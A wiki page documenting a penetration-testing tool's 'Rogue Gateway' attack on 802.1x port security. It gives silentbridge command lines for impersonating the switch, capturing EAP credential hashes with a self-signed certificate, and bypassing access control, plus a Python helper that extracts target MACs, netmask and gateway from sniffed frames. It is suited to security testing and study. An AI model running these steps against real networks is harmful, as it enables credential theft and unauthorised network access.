
Rogue Gateway Attack

Gabriel Ryan edited this page Aug 3, 2018 · 5 revisions


Effective against: 802.1x-2010 (Device Configuration B only), 802.1x-2004, 802.1x-2001

In a Rogue Gateway attack, the attacker impersonates the authenticator (the switch) in order to force the supplicant to perform EAP authentication against the attacker's rogue device instead of the real network. When a weak EAP method is in use, this yields authentication material (for example challenge/response hashes) that can be cracked offline to recover plaintext credentials. Those credentials can then be used to authenticate to the network with the Bait n Switch attack, effectively bypassing port security without using a bridge at all.

When used with Device Configuration B, the Rogue Gateway attack can also be used to bypass 802.1x-2010 in cases where weak EAP methods are used (note that this has not been tested against MACsec implemented with a pre-shared key).

Begin by connecting your rogue device between the supplicant and the authenticator as described in Device Placement.

Next, connect to your device using your side channel (see: Software Setup).

Next, use the --cert-wizard flag to generate a self-signed certificate for the rogue EAP server. The attack depends on the supplicant accepting this certificate: a supplicant configured to validate the server certificate against a trusted CA will abort the exchange before it sends any credentials.

./silentbridge --cert-wizard

Then, follow the instruction set below that is relevant to your device's configuration:

Rogue Gateway - Device Configuration A

Begin by performing a classic 802.1x bypass as described in Classic 802.1x Bypass.

Then, use tcpdump on the bridged interfaces to passively gather the following data points:

  • supplicant MAC address
  • switch MAC address
  • subnet netmask
  • gateway IP

Then, use the --rogue-gateway command to perform the rogue gateway attack:

./silentbridge --rogue-gateway --upstream eno1 --client-mac 38:60:77:d0:ef:0b --phy eno2 --switch-mac 00:42:5a:87:57:85 --netmask 255.255.255.0 --gw-ip 192.168.1.1

When finished, hit CTRL+C to terminate the attack. Then use the --bridge-up command to restore the classic 802.1x bypass:

./silentbridge --bridge-up

Rogue Gateway - Device Configuration B

Begin by using the --splitterctl command to make sure that both splitters are in the "bypass" position:

./silentbridge --splitterctl --upstream-splitter bypass --phy-splitter bypass

Next, use tcpdump to sniff traffic on the interfaces connected to the device's passive tap. Gather the following data points:

  • supplicant MAC address
  • switch MAC address
  • subnet netmask
  • gateway IP
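The four data points listed above (for both Device Configuration A and B) can be pulled out of a passive capture mechanically rather than by reading tcpdump output by eye. The following is an added example written for this page, not silentbridge's own code: it walks raw Ethernet frames and recovers the supplicant MAC from EAPOL-Start / EAP-Response frames, the switch MAC from EAP-Request frames, and the netmask and gateway from DHCP option 1 and option 3 in a server-to-client DHCP message. It also records the EAPOL protocol version, which indicates which 802.1X revision the switch speaks (1 = 2001, 2 = 2004, 3 = 2010). The function names and the constructed sample frames in sample_capture() are assumptions for the example; real input would be frames read from a tcpdump -w capture.

```python
"""Added example (not silentbridge code): pull the four values that
--rogue-gateway needs out of passively captured Ethernet frames.
Function names and the constructed sample frames are assumptions."""
import ipaddress
import struct

ETH_P_EAPOL = 0x888E
ETH_P_IP = 0x0800
PAE_GROUP_ADDR = bytes.fromhex("0180c2000003")   # 802.1X PAE group address
DHCP_MAGIC = b"\x63\x82\x53\x63"


def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def dhcp_options(body):
    """Return {code: value} for the options in a DHCP message body."""
    opts = {}
    if body[236:240] != DHCP_MAGIC:
        return opts
    i = 240
    while i < len(body):
        code = body[i]
        if code == 0:            # pad
            i += 1
            continue
        if code == 255:          # end of options
            break
        length = body[i + 1]
        opts[code] = body[i + 2:i + 2 + length]
        i += 2 + length
    return opts


def recon(frames):
    """Walk raw Ethernet frames and record supplicant MAC, switch MAC,
    netmask and gateway IP, plus the EAPOL protocol version seen."""
    found = {"client_mac": None, "switch_mac": None,
             "netmask": None, "gw_ip": None, "eapol_version": None}
    for frame in frames:
        src = frame[6:12]
        ethertype = struct.unpack("!H", frame[12:14])[0]
        payload = frame[14:]
        if ethertype == ETH_P_EAPOL and len(payload) >= 4:
            # EAPOL header: version(1) type(1) length(2)
            found["eapol_version"] = payload[0]   # 1=802.1X-2001, 2=2004, 3=2010
            if payload[1] == 1:                   # EAPOL-Start: only the supplicant sends it
                found["client_mac"] = mac_str(src)
            elif payload[1] == 0 and len(payload) >= 8:
                # EAP header: code(1) id(1) length(2); code 1 = Request (authenticator side)
                eap_code = payload[4]
                if eap_code == 1:
                    found["switch_mac"] = mac_str(src)
                elif eap_code == 2:               # Response comes from the supplicant
                    found["client_mac"] = mac_str(src)
        elif ethertype == ETH_P_IP and len(payload) >= 20 and payload[9] == 17:
            ihl = (payload[0] & 0x0F) * 4
            udp = payload[ihl:]
            sport, dport = struct.unpack("!HH", udp[:4])
            if sport == 67 and dport == 68:       # DHCPOFFER/DHCPACK from the server side
                opts = dhcp_options(udp[8:])
                if 1 in opts:
                    found["netmask"] = str(ipaddress.IPv4Address(opts[1][:4]))
                if 3 in opts:
                    found["gw_ip"] = str(ipaddress.IPv4Address(opts[3][:4]))
    return found


# --- constructed sample frames (stand-ins for a real tcpdump capture) ---

def eapol_start(client_mac, version=2):
    return PAE_GROUP_ADDR + client_mac + struct.pack("!H", ETH_P_EAPOL) + bytes([version, 1, 0, 0])


def eap_request_identity(switch_mac, version=2):
    eap = bytes([1, 1, 0, 5, 1])                  # code=Request id=1 len=5 type=Identity
    eapol = bytes([version, 0]) + struct.pack("!H", len(eap)) + eap
    return PAE_GROUP_ADDR + switch_mac + struct.pack("!H", ETH_P_EAPOL) + eapol


def dhcp_offer(server_mac, client_mac, yiaddr, netmask, gw):
    fixed = struct.pack("!BBBBIHH4s4s4s4s16s64s128s", 2, 1, 6, 0, 0x1234, 0, 0,
                        b"\0" * 4, ipaddress.IPv4Address(yiaddr).packed, b"\0" * 4, b"\0" * 4,
                        client_mac + b"\0" * 10, b"\0" * 64, b"\0" * 128)
    opts = (DHCP_MAGIC + b"\x35\x01\x02"                      # option 53: DHCPOFFER
            + b"\x01\x04" + ipaddress.IPv4Address(netmask).packed   # option 1: subnet mask
            + b"\x03\x04" + ipaddress.IPv4Address(gw).packed + b"\xff")  # option 3: router
    body = fixed + opts
    udp = struct.pack("!HHHH", 67, 68, 8 + len(body), 0) + body
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(udp), 0, 0, 64, 17, 0,
                     ipaddress.IPv4Address(gw).packed, ipaddress.IPv4Address(yiaddr).packed) + udp
    return client_mac + server_mac + struct.pack("!H", ETH_P_IP) + ip


def sample_capture():
    client = bytes.fromhex("386077d0ef0b")
    switch = bytes.fromhex("00425a875785")
    return [eapol_start(client), eap_request_identity(switch),
            dhcp_offer(switch, client, "192.168.1.50", "255.255.255.0", "192.168.1.1")]


if __name__ == "__main__":
    print(recon(sample_capture()))
```

Feed recon() raw frames read from a tcpdump -w capture with any pcap reader; the block itself only needs the standard library. If the supplicant authenticated and obtained its lease before the tap was in place, no EAPOL or DHCP traffic will appear, and the netmask and gateway have to be inferred from ARP replies and routed traffic instead, which this example does not attempt.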

Then, use the --rogue-gateway command to perform the rogue gateway attack:

./silentbridge --rogue-gateway --upstream eno1 --client-mac 38:60:77:d0:ef:0b --phy eno2 --switch-mac 00:42:5a:87:57:85 --netmask 255.255.255.0 --gw-ip 192.168.1.1 --use-splitters

When finished, hit CTRL+C to terminate the attack.